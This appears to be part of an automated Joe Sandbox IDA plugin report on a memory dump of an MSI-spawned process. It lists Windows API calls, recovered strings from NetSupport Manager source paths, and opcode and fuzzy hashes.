                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wvsprintf
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 2795597889-2052047905
                                                                                                                        • Opcode ID: 518d7ec95af5d8fdb64bee83421c9a5835480bee03fa71df82bf8dcbbdaf9c8d
                                                                                                                        • Instruction ID: ad2379118a7b69cd668880bf8c300f71c08068f4d5355b03dee6ee35d2f1128e
                                                                                                                        • Opcode Fuzzy Hash: 518d7ec95af5d8fdb64bee83421c9a5835480bee03fa71df82bf8dcbbdaf9c8d
                                                                                                                        • Instruction Fuzzy Hash: C8F06235A10108A7CB14AFA49C159AE77F8EB85700F008199F906972D0EE749A4887D5
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wvsprintf
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 2795597889-2052047905
                                                                                                                        • Opcode ID: 1798f7b8236e82a723f9c82ba9ee7e2f273c4771bf28fa1c382b6adfa4f5ee2b
                                                                                                                        • Instruction ID: 015a18564e6ddb0ff5ebaf0c368d1a29e2402b13c850a6e1fa86c6e6a9f297d0
                                                                                                                        • Opcode Fuzzy Hash: 1798f7b8236e82a723f9c82ba9ee7e2f273c4771bf28fa1c382b6adfa4f5ee2b
                                                                                                                        • Instruction Fuzzy Hash: 61F08176A10208A7CB10EFA4EC559EEBBF8EF44710F108199F445A7290EE709A48C7D1
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AEA029
                                                                                                                        • wsprintfW.USER32 ref: 00AEA048
                                                                                                                          • Part of subcall function 00AE9FD0: _free.LIBCMT ref: 00AE9FDE
                                                                                                                          • Part of subcall function 00AE9FD0: __wcsdup.LIBCMT ref: 00AE9FEA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory__wcsdup_freewsprintf
                                                                                                                        • String ID: \%s.inf
                                                                                                                        • API String ID: 2724493947-3360618689
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,SetSecurityInfo), ref: 00B0C454
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C489
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: SetSecurityInfo
                                                                                                                        • API String ID: 199729137-240378450
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B399AC: __getptd.LIBCMT ref: 00B399B2
                                                                                                                          • Part of subcall function 00B399AC: __getptd.LIBCMT ref: 00B399C2
                                                                                                                        • __getptd.LIBCMT ref: 00B44EAC
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __getptd.LIBCMT ref: 00B44EBA
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,BuildExplicitAccessWithNameW), ref: 00B0C364
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C391
                                                                                                                        Strings
                                                                                                                        • BuildExplicitAccessWithNameW, xrefs: 00B0C35E
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: BuildExplicitAccessWithNameW
                                                                                                                        • API String ID: 199729137-2598508172
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,ConvertStringSecurityDescriptorToSecurityDescriptorW), ref: 00AFC014
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00AFC03D
                                                                                                                        Strings
                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW, xrefs: 00AFC00E
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorW
                                                                                                                        • API String ID: 199729137-4218572124
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,SetEntriesInAclW), ref: 00B0C404
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C42D
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: SetEntriesInAclW
                                                                                                                        • API String ID: 199729137-3166073420
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpywsprintf
                                                                                                                        • String ID: %s\ConfigList\%s
                                                                                                                        • API String ID: 2047606353-2266011117
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,CheckTokenMembership), ref: 00B12154
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B12179
                                                                                                                        Strings
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: CheckTokenMembership
                                                                                                                        • API String ID: 199729137-412103321
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B0B080: GetCurrentThreadId.KERNEL32 ref: 00B0B08E
                                                                                                                          • Part of subcall function 00B0B080: EnterCriticalSection.KERNEL32(?,?,?,00B8C2FC,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B098
                                                                                                                          • Part of subcall function 00B0B080: LeaveCriticalSection.KERNEL32(?,?,00000000,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B0B8
                                                                                                                        • LoadStringW.USER32(00000000,?,00000454,00000200), ref: 00B1221C
                                                                                                                        • wsprintfW.USER32 ref: 00B1222D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveLoadStringThreadwsprintf
                                                                                                                        • String ID: #%d
                                                                                                                        • API String ID: 3162899704-1734759437
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,ConvertStringSidToSidW), ref: 00B0C3B4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C3D5
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: ConvertStringSidToSidW
                                                                                                                        • API String ID: 199729137-806449257
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,IsWow64Process), ref: 00B329C4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B329E5
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: IsWow64Process
                                                                                                                        • API String ID: 199729137-777008139
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 00B120D4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B120F1
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: GetDpiForWindow
                                                                                                                        • API String ID: 199729137-4136707520
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: NameName::
                                                                                                                        • String ID: {flat}
                                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 00B12111
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B12127
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: GetDpiForSystem
                                                                                                                        • API String ID: 199729137-3023621526
                                                                                                                        APIs
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B046C9
                                                                                                                        Strings
                                                                                                                        • m_hKey != NULL, xrefs: 00B046B5
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp, xrefs: 00B046B0
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete
                                                                                                                        • String ID: e:\nsmsrc\nsm\1410\1410\ctl32\RegKey.cpp$m_hKey != NULL
                                                                                                                        • API String ID: 1035893169-214662663
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf
                                                                                                                        • String ID: ipc %s@%u$no error
                                                                                                                        • API String ID: 2111968516-3872069982
                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,True,?), ref: 00B24270
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite
                                                                                                                        • String ID: False$True
                                                                                                                        • API String ID: 390214022-1895882422
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • GetProcAddress("WdfPreDeviceRemove") failed: %d, xrefs: 00AFB505
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_wprintf
                                                                                                                        • String ID: GetProcAddress("WdfPreDeviceRemove") failed: %d
                                                                                                                        • API String ID: 1155858372-3472313902